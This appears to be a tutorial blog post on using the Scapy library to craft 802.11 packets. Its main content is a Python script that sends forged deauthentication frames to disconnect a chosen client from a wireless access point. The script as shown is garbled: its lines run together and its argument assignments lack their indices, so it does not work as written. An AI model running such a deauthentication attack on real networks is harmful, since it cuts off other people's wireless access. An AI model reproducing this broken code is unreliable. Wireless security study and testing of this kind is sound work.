In the previous blog post we begun diving into the wonderful world of 802.11 protocol. 802.11 is a protocol for defining a set of media access controls and physical layer specifications for implementing a wireless LAN access. What is most commonly known as wireless technology. In this blog post we will be looking at using a popular Python module named Scapy to manipulate, craft, and send 802.11 packets over the air.
There are some prerequisites if you plan on following along with this blog post, and trying some of the code written here. The code should work on most Debian Linux systems. I will be using Kali Linux for my testing since I use that most days. Additionally, you will need Python and the Scapy module. You can install the Scapy module using a Python package installer such as Pip or Easy_Install. Finally, you will need a wireless interface card that can support monitor mode. You can find instructions on
Scapy is a powerful Python-based interactive packet manipulation program and library. It is able to forge or decode packets of a wide number of protocols, send them on the wire, capture them, store or read them using pcap files, match requests and replies, and much more. It is designed to allow fast packet prototyping by using default values that work.
Python Deauthentication Packet
#!/usr/bin/env python from scapy.all import * import sys def deauth(iface,bssid,client,count): packet = RadioTap()/Dot11(type=0,subtype=12,addr1=client,addr2=bssid,addr3=bssid)/Dot11Deauth(reason=7) for n in range(int(count)): sendp(packet) print 'Deauth sent via: '+iface+' to BSSID: '+bssid+' for Client: '+client if __name__ == "__main__": if len(sys.argv) !=5: print 'Usuage is - ./deauth.py interface bssid client count' print 'Example - ./deauth.py wlan0mon 00:11:22:33:44:55 55:44:33:22:11:00 4' sys.exit(1) # The interface that you want to send packets out of (monitor mode) conf.iface = sys.argv # the BSSID of the Wireless Access Point you want to target bssid = sys.argv # The MAC address of the Client you want to kick off the Access Point client = sys.argv # The number of deauth packets you want to send count = sys.argv # Used to supress scapy output return conf.verb = 0 # run the deauth function deauth(conf.iface,bssid,client,count)
Data Frame and Control Frame coming later.